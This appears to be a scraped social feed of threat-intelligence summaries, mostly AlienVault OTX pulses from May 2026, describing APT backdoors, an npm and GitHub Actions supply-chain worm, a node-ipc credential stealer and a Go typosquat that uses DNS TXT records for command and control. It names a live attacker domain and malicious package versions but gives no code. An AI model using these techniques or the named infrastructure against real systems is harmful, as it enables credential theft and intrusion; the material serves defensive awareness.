New burrowing techniques

Webworm is a China-aligned APT group that has evolved its tactics since first being discovered in 2022, shifting focus from Asian targets to European governmental organizations. In 2025, the group deployed two new backdoors: EchoCreep, which uses Discord for command and control, and GraphWorm, which leverages Microsoft Graph API. Researchers decrypted over 400 Discord messages revealing four victims and analyzed a compromised Amazon S3 bucket used for data exfiltration. The group stages tools in GitHub repositories and uses multiple custom proxy solutions including WormFrp, ChainWorm, SmuxProxy, and WormSocket to create hidden networks. Webworm appears to exploit web vulnerabilities using tools like nuclei and dirsearch for initial access, targeting government entities and educational institutions across Europe and South Africa.

Pulse ID: 6a0df33ecc667be61a0a9608
Pulse Link: https://otx.alienvault.com/pulse/6a0df33ecc667be61a0a9608
Pulse Author: AlienVault
Created: 2026-05-20 17:45:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Africa #Amazon #Asia #BackDoor #China #CyberSecurity #Discord #Education #Europe #GitHub #Government #ICS #InfoSec #Microsoft #OTX #OpenThreatExchange #Proxy #RAT #Worm #bot #AlienVault

The Worm That Keeps on Digging: Latest Wave

A sophisticated supply chain campaign targeting the open source developer ecosystem has emerged, compromising NPM packages in the @antv namespace, GitHub Actions including actions-cool/issues-helper, and the VSCode extension nrwl.angular-console. The malware initiates multi-stage infection chains using GitHub-hosted infrastructure and orphaned commits to deploy payloads via bun. It harvests extensive credentials including GitHub tokens, SSH keys, cloud credentials, and browser secrets, exfiltrating data through attacker-controlled public GitHub repositories. The campaign establishes persistence through a Python backdoor that polls GitHub for signed commands containing specific trigger strings, enabling remote code execution. Infrastructure analysis and operational patterns indicate moderate confidence attribution to the threat actor TeamPCP.

Pulse ID: 6a0c5b666ccb232590e33087
Pulse Link: https://otx.alienvault.com/pulse/6a0c5b666ccb232590e33087
Pulse Author: AlienVault
Created: 2026-05-19 12:45:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Cloud #CyberSecurity #GitHub #InfoSec #Malware #NPM #OTX #OpenThreatExchange #Python #RAT #RCE #RemoteCodeExecution #SSH #SupplyChain #Troll #Worm #bot #AlienVault

APT Targets Azerbaijani Oil and Gas Industry

A sophisticated multi-wave intrusion campaign targeted an Azerbaijani oil and gas company from late December 2025 through late February 2026, attributed with moderate-to-high confidence to the Chinese APT group FamousSparrow. The operation exploited unpatched Microsoft Exchange servers via ProxyShell and ProxyNotShell vulnerabilities to establish initial access. Attackers deployed two distinct backdoor families - Deed RAT and Terndoor - across three separate waves, demonstrating operational persistence by repeatedly exploiting the same entry point despite remediation attempts. Technical analysis revealed an evolved DLL sideloading technique using a two-stage trigger mechanism that gates execution through legitimate application control flow, effectively evading automated sandbox analysis. The campaign extended FamousSparrow's known targeting to South Caucasus energy infrastructure, coinciding with Azerbaijan's increased strategic importance to European energy security following disruptions in Russian and Mi...

Pulse ID: 6a0d96aadcfeadab9eea10d0
Pulse Link: https://otx.alienvault.com/pulse/6a0d96aadcfeadab9eea10d0
Pulse Author: AlienVault
Created: 2026-05-20 11:10:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Azerbaijan #BackDoor #Caucasus #Chinese #CyberSecurity #Europe #InfoSec #Microsoft #OTX #OpenThreatExchange #Proxy #RAT #Russia #SideLoading #bot #AlienVault

Popular node-ipc npm Package Infected with Credential Stealer

A supply chain attack has compromised the node-ipc npm package, with malicious versions 9.1.6, 9.2.3, and 12.0.1 containing obfuscated stealer and backdoor functionality. The attack vector involved takeover of a dormant maintainer account through an expired email domain. The malware fingerprints host environments, enumerates and reads local files including SSH keys, cloud credentials, database configurations, and various developer secrets. Collected data is compressed into a gzip archive and exfiltrated via DNS TXT queries to attacker-controlled infrastructure disguised as legitimate Azure domains. The payload targets over 100 file patterns across macOS and Linux systems, focusing on developer credentials from AWS, Azure, GCP, Kubernetes, Docker, npm, GitHub, and numerous other services. The malicious code executes during CommonJS module loading, forking a detached child process to perform credential harvesting while avoiding detection through obfuscation and DNS-based covert channels.

Pulse ID: 6a0d970e99916e7e7e17c893
Pulse Link: https://otx.alienvault.com/pulse/6a0d970e99916e7e7e17c893
Pulse Author: AlienVault
Created: 2026-05-20 11:12:14

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #Azure #BackDoor #Cloud #CredentialHarvesting #CyberSecurity #DNS #Docker #Email #GitHub #InfoSec #Linux #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #RAT #SSH #SupplyChain #Troll #ZIP #bot #AlienVault

‪A Grantler [email protected]‬
‪@agrantler.bsky.social‬
· 5 Min.
Running bitlocker with TPM only without PIN has never been a good idea. Question is, why there's the WinRE feature for unlocking the device at all. This looks really like a #backdoor.
And there are rumors there's a vulnerability for TPM+PIN, too.
We'll see.

#microsoft #infosec #cybersec #yellowkey #news

https://thehackernews.com/2026/05/microsoft-releases-mitigation-for.html

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Pulse ID: 6a0e909c639e7bf719f13c28
Pulse Link: https://otx.alienvault.com/pulse/6a0e909c639e7bf719f13c28
Pulse Author: Tr1sa111
Created: 2026-05-21 04:57:00

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #DNS #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Pulse ID: 6a0e90b664bc1f5af00fb81d
Pulse Link: https://otx.alienvault.com/pulse/6a0e90b664bc1f5af00fb81d
Pulse Author: Tr1sa111
Created: 2026-05-21 04:57:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #DNS #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

A long-running typosquatting campaign impersonated the widely used shopspring/decimal Go library by publishing github.com/shopsprint/decimal, differing by a single character. Active since November 2017, the package remained benign through seven releases until being weaponized in August 2023 with version v1.3.3. This version introduced a malicious init() function that executes automatically on import, establishing a DNS TXT record-based command and control channel to dnslog-cdn-images.freemyip.com. The backdoor polls every five minutes and executes arbitrary commands returned via TXT records. Although the GitHub repository and owner account have been deleted, the malicious module remains permanently cached and accessible through Go's module proxy system, continuing to pose a supply chain risk to developers who mistype the package name.

Pulse ID: 6a0d278a6320921cb57f8b69
Pulse Link: https://otx.alienvault.com/pulse/6a0d278a6320921cb57f8b69
Pulse Author: AlienVault
Created: 2026-05-20 03:16:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CDN #CyberSecurity #DNS #GitHub #InfoSec #OTX #OpenThreatExchange #Proxy #SupplyChain #TypoSquatting #bot #developers #AlienVault

QLNX: il nuovo implant Linux silenzioso che saccheggia la supply chain del software

https://insicurezzadigitale.com/qlnx-il-nuovo-implant-linux-silenzioso-che-saccheggia-la-supply-chain-del-software/